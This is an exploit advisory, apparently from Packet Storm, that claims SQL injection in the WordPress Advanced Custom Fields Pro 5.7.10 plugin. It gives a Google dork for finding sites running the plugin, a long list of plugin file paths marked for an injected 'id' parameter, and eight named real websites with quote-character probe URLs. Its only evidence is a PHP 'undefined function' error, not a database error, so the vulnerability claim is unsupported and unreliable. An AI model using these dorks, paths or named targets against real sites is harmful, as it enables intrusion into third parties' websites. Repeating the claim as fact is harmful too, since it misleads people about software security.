WordPress Advanced Custom Fields Pro plugin version 5.7.10 suffers from a remote SQL injection vulnerability.
ea0ca8ac5e7b836fd4bb0f130e33b2dd067fca9e411a6d1c9f1ef696e354098e####################################################################
# Exploit Title : WordPress Advanced Custom Fields Pro Plugins 5.7.10 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 28/01/2019
# Vendor Homepage : advancedcustomfields.com/pro/
# Software Download Link : downloads.wordpress.org/plugin/advanced-custom-fields.5.7.10.zip
# Software Information Link : wordpress.org/plugins/advanced-custom-fields/
# Software Version : 5.7.10
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/advanced-custom-fields-pro/''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
####################################################################
# Description about Software :
***************************
Advanced Custom Fields is open source software for WordPress.
####################################################################
# Impact :
***********
* WordPress Advanced Custom Fields Pro Plugins 5.7.10 is prone to an
SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
data before using it in an SQL query.
* Exploiting this issue could allow an attacker to compromise the application, read,
access or modify data, or exploit latent vulnerabilities in the underlying database.
If the webserver is misconfigured, read & write access to the filesystem may be possible.
####################################################################
# SQL Injection Exploit :
**********************
/wp-content/plugins/advanced-custom-fields-pro/pro/acf-pro.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/pro/admin/views/html-options-page.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/pro/admin/views/html-settings-updates.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/pro/fields/class-acf-field-clone.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/pro/fields/class-acf-field-flexible-content.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/pro/fields/class-acf-field-gallery.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/pro/fields/class-acf-field-repeater.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/admin/admin-field-group.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/admin/admin-field-groups.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/admin/settings-addons.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/admin/settings-info.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/admin/views/field-group-field-conditional-logic.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/admin/views/field-group-field.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/admin/views/field-group-fields.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/admin/views/field-group-locations.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/admin/views/field-group-options.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/admin/views/html-admin-tools.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/admin/views/html-location-group.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/admin/views/html-location-rule.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/admin/views/install-network.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/admin/views/install-notice.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/admin/views/install.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/admin/views/settings-addons.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/admin/views/settings-info.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/ajax.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/api/index.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/compatibility.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/forms/form-attachment.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/forms/form-comment.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/forms/form-post.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/forms/form-taxonomy.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/forms/form-user.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/forms/form-widget.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/media.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/wpml.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-accordion.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-checkbox.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-color_picker.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-date_picker.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-date_time_picker.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-email.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-file.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-google-map.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-group.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-image.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-link.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-message.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-number.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-oembed.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-output.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-page_link.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-password.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-post_object.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-radio.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-range.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-relationship.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-select.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-separator.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-tab.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-taxonomy.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-text.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-textarea.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-time_picker.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-true_false.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-url.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-user.php?id=[SQL Injection]
/wp-content/plugins/advanced-custom-fields-pro/includes/fields/class-acf-field-wysiwyg.php?id=[SQL Injection]
####################################################################
# Example Vulnerable Sites :
*************************
[+] sjolinsgymnasium.se/wp-content/plugins/advanced-custom-fields-pro/pro/acf-pro.php?id=1%27
[+] scharrelsenschuim.nl/wp-content/plugins/advanced-custom-fields-pro/pro/acf-pro.php?id=1%27
[+] riisparkbeachbazaar.com/wp-content/plugins/advanced-custom-fields-pro/pro/acf-pro.php?id=1%27
[+] berkeleyhort.com/wp-content/plugins/advanced-custom-fields-pro/pro/acf-pro.php?id=1%27
[+] orchestraoftheswan.org/wp-content/plugins/advanced-custom-fields-pro/pro/acf-pro.php?id=1%27
[+] obriengroupaustralia.com.au/wp-content/plugins/advanced-custom-fields-pro/pro/acf-pro.php?id=1%27
[+] campquinebarge.com/wp-content/plugins/advanced-custom-fields-pro/pro/acf-pro.php?id=1%27
[+] ha-bikta.co.il/wp-content/plugins/advanced-custom-fields-pro/pro/acf-pro.php?id=1%27
####################################################################
# SQL Database Error :
*********************
Fatal error: Call to undefined function acf_update_setting() in
/home/obriengr/public_html/wp-content/plugins
/advanced-custom-fields-pro/pro/acf-pro.php on line 23
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed